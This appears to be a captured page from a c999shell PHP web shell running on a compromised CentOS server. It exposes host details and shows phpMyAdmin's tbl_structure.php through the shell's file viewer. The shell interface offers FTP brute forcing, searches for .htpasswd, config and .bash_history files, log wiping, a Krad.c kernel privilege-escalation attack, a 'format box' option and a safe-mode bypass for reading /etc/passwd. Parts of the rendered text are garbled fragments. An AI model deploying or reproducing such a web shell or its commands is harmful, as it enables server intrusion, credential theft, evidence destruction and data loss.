Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.16%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     tbl_structure.php (37.73 KB)      -rw-r--r--

 is used
 */
if (isset($_REQUEST['submit_mult_change_x'])) {
    $submit_mult = 'change';
} elseif (isset($_REQUEST['submit_mult_drop_x'])) {
    $submit_mult = 'drop';
} elseif (isset($_REQUEST['submit_mult_primary_x'])) {
    $submit_mult = 'primary';
} elseif (isset($_REQUEST['submit_mult_index_x'])) {
    $submit_mult = 'index';
} elseif (isset($_REQUEST['submit_mult_unique_x'])) {
    $submit_mult = 'unique';
} elseif (isset($_REQUEST['submit_mult_fulltext_x'])) {
    $submit_mult = 'ftext';
} elseif (isset($_REQUEST['submit_mult_browse_x'])) {
    $submit_mult = 'browse';
} elseif (isset($_REQUEST['submit_mult'])) {
    $submit_mult = $_REQUEST['submit_mult'];
} elseif (isset($_REQUEST['mult_btn']) && $_REQUEST['mult_btn'] == __('Yes')) {
    $submit_mult = 'row_delete';
    if (isset($_REQUEST['selected'])) {
        $_REQUEST['selected_fld'] = $_REQUEST['selected'];
    }
}

if (! empty($submit_mult) && isset($_REQUEST['selected_fld'])) {
    $err_url = 'tbl_structure.php?' . PMA_generate_common_url($db, $table);
    if ($submit_mult == 'browse') {
        // browsing the table displaying only selected fields/columns
        $GLOBALS['active_page'] = 'sql.php';
        $sql_query = '';
        foreach ($_REQUEST['selected_fld'] as $idx => $sval) {
            if ($sql_query == '') {
                $sql_query .= 'SELECT ' . PMA_backquote($sval);
            } else {
                $sql_query .=  ', ' . PMA_backquote($sval);
            }
        }

        // what is this htmlspecialchars() for??
        //$sql_query .= ' FROM ' . PMA_backquote(htmlspecialchars($table));
        $sql_query .= ' FROM ' . PMA_backquote($db) . '.' . PMA_backquote($table);
        require './sql.php';
        exit;
    } else {
        // handle multiple field commands
        // handle confirmation of deleting multiple fields/columns
        $action = 'tbl_structure.php';
        require './libraries/mult_submits.inc.php';
        //require_once './libraries/header.inc.php';
        //require_once './libraries/tbl_links.inc.php';

        if (empty($message)) {
            $message = PMA_Message::success();
        }
    }
}

/**
 * Gets the relation settings
 */
$cfgRelation = PMA_getRelationsParam();

/**
 * Runs common work
 */
require_once './libraries/tbl_common.php';
$url_query .= '&goto=tbl_structure.php&back=tbl_structure.php';
$url_params['goto'] = 'tbl_structure.php';
$url_params['back'] = 'tbl_structure.php';

/**
 * Prepares the table structure display
 */


/**
 * Gets tables informations
 */
require_once './libraries/tbl_info.inc.php';

/**
 * Displays top menu links
 */
require_once './libraries/tbl_links.inc.php';
require_once './libraries/Index.class.php';

// 2. Gets table keys and retains them
// @todo should be: $server->db($db)->table($table)->primary()
$primary = PMA_Index::getPrimary($table, $db);

$columns_with_unique_index = array();
foreach (PMA_Index::getFromTable($table, $db) as $index) {
    if ($index->isUnique() && $index->getChoice() == 'UNIQUE') {
        $columns = $index->getColumns();
        foreach ($columns as $column_name => $dummy) {
            $columns_with_unique_index[$column_name] = 1;
        }
    }
}
unset($index, $columns, $column_name, $dummy);

// 3. Get fields
$fields_rs   = PMA_DRIZZLE
			? PMA_DBI_query('SHOW COLUMNS FROM ' . PMA_backquote($table) . ';', null, PMA_DBI_QUERY_STORE)
			: PMA_DBI_query('SHOW FULL FIELDS FROM ' . PMA_backquote($table) . ';', null, PMA_DBI_QUERY_STORE);
$fields_cnt  = PMA_DBI_num_rows($fields_rs);

// Get more complete field information
// For now, this is done just for MySQL 4.1.2+ new TIMESTAMP options
// but later, if the analyser returns more information, it
// could be executed for any MySQL version and replace
// the info given by SHOW FULL FIELDS FROM.
//
// We also need this to correctly learn if a TIMESTAMP is NOT NULL, since
// SHOW FULL FIELDS or INFORMATION_SCHEMA incorrectly says NULL
// and SHOW CREATE TABLE says NOT NULL (tested
// in MySQL 4.0.25 and 5.0.21, http://bugs.mysql.com/20910).

$show_create_table = PMA_DBI_fetch_value(
        'SHOW CREATE TABLE ' . PMA_backquote($db) . '.' . PMA_backquote($table),
        0, 1);
$analyzed_sql = PMA_SQP_analyze(PMA_SQP_parse($show_create_table));

/**
 * prepare table infos
 */
// action titles (image or string)
$titles = array();
$titles['Change']               = PMA_getIcon('b_edit.png', __('Change'), true);
$titles['Drop']                 = PMA_getIcon('b_drop.png', __('Drop'), true);
$titles['NoDrop']               = PMA_getIcon('b_drop.png', __('Drop'), true);
$titles['Primary']              = PMA_getIcon('b_primary.png', __('Primary'), true);
$titles['Index']                = PMA_getIcon('b_index.png', __('Index'), true);
$titles['Unique']               = PMA_getIcon('b_unique.png', __('Unique'), true);
$titles['IdxFulltext']          = PMA_getIcon('b_ftext.png', __('Fulltext'), true);
$titles['NoPrimary']            = PMA_getIcon('bd_primary.png', __('Primary'), true);
$titles['NoIndex']              = PMA_getIcon('bd_index.png', __('Index'), true);
$titles['NoUnique']             = PMA_getIcon('bd_unique.png', __('Unique'), true);
$titles['NoIdxFulltext']        = PMA_getIcon('bd_ftext.png', __('Fulltext'), true);
$titles['BrowseDistinctValues'] = PMA_getIcon('b_browse.png', __('Browse distinct values'), true);

// hidden action titles (image and string)
$hidden_titles = array();
$hidden_titles['BrowseDistinctValues'] = PMA_getIcon('b_browse.png', __('Browse distinct values'), false, true);
$hidden_titles['Primary']              = PMA_getIcon('b_primary.png', __('Add primary key'), false, true);
$hidden_titles['NoPrimary']            = PMA_getIcon('bd_primary.png', __('Add primary key'), false, true);
$hidden_titles['Index']                = PMA_getIcon('b_index.png', __('Add index'), false, true);
$hidden_titles['NoIndex']              = PMA_getIcon('bd_index.png', __('Add index'), false, true);
$hidden_titles['Unique']               = PMA_getIcon('b_unique.png', __('Add unique index'), false, true);
$hidden_titles['NoUnique']             = PMA_getIcon('bd_unique.png', __('Add unique index'), false, true);
$hidden_titles['IdxFulltext']          = PMA_getIcon('b_ftext.png', __('Add FULLTEXT index'), false, true);
$hidden_titles['NoIdxFulltext']        = PMA_getIcon('bd_ftext.png', __('Add FULLTEXT index'), false, true);

/**
 * Displays the table structure ('show table' works correct since 3.23.03)
 */
/* TABLE INFORMATION */
// table header
$i = 0;
?>

    ';
	} else if ($tbl_is_view) {
	     echo '"view" />';
	} else {
	     echo '"table" />';
	} ?>

bool(false)



    

    
#
    

    

    

    

    

    

    



:: Command execute ::
Enter:  
Select: 
-----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports 



:: Shadow's tricks :D  ::

  

    
Useful Commands 
    
    

      

        
        
          
            Kernel version
              Logged in users
                Last to connect
                  Suid bins
                    USER WITHOUT PASSWORD!
                    Write in /etc/?
                    Downloaders?
                    CPUINFO
                    Open ports
                    gcc installed?
					Format box (DANGEROUS)
                    WIPELOGS PT1 (If wget installed)
                    WIPELOGS PT2
                    WIPELOGS PT3
                    Kernel attack (Krad.c) PT1 (If wget installed)
                    Kernel attack (Krad.c) PT2 (L1)
                    Kernel attack (Krad.c) PT2 (L2)
                    Kernel attack (Krad.c) PT2 (L3)
                    Kernel attack (Krad.c) PT2 (L4)
                    Kernel attack (Krad.c) PT2 (L5)
                  
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  

   Kernel Info: 

      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  

   Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    
    




 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]



:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--